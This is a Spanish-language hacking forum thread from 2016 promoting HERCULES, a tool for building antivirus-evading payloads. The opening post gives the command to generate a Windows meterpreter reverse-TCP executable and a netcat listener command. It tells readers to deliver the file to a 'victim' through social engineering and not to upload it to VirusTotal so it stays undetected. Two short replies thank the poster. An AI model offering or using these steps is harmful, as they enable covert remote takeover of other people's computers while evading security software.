Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: afravaz en Septiembre 09, 2016, 12:15:34 PM

Título: HERCULES: Genera un payload y evade los antivirus
Publicado por: afravaz en Septiembre 09, 2016, 12:15:34 PM
(http://fotos.subefotos.com/86ace2ce040981fdc547d070c7ce5ce4o.png)
Definición:

Hercules es una herramienta cuyo proposito es generar un payload fud (Fully Undetectable) que evade antivirus.

Antes de nada:

*POR FAVOR NO SUBAIS EL PAYLOAD A VIRUSTOTAL!, porque dejaría de ser FUD.

Tutorial:

./HERCULES_x64 192.168.1.20 4444 –p windows/meterpreter/reverse_tcp –a x64 –l dynamic
"./HERCULES_x64 [IP LOCAL] [PUERTO] –p [PAYLOAD] –a [ARQUITECTURA] –l [LINKER]"

Se nos guardará un payload que tendrá el nombre de Payload.exe el cual enviaremos a nuestra victima mediante cualquier técnica de ingeniería social.
Crearemos un listener TCP con NetCat escribiendo el comando:
nc –l –p [PUERTO]

+ Cabe destacar que también podremos poner un listenner de metasploit y ganar así una sesión meterpreter.
*NetCat: Es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).

Ratio de detección:
(https://4.bp.blogspot.com/-W4MayvqjPPk/V9HwpO430WI/AAAAAAAAAX4/_xCUBFR5_PQGsHjUE3qZyA6pcreM_gLOwCLcB/s400/6fyJb0joWOTpZ9E3vU1amt.png)

Descarga:

https://github.com/EgeBalci/HERCULES

Vídeo:
Título: Re:HERCULES: Genera un payload y evade los antivirus
Publicado por: Pricker en Septiembre 09, 2016, 03:42:27 PM
Excelente aporte, lo probaré en mi lab.. y ver q pinta, gracias

Enviado desde mi XT1058 mediante Tapatalk

Título: Re:HERCULES: Genera un payload y evade los antivirus
Publicado por: ro0tmag en Septiembre 09, 2016, 04:07:48 PM
Muy bueno! No conocía este tipo de herramientas.

Gracias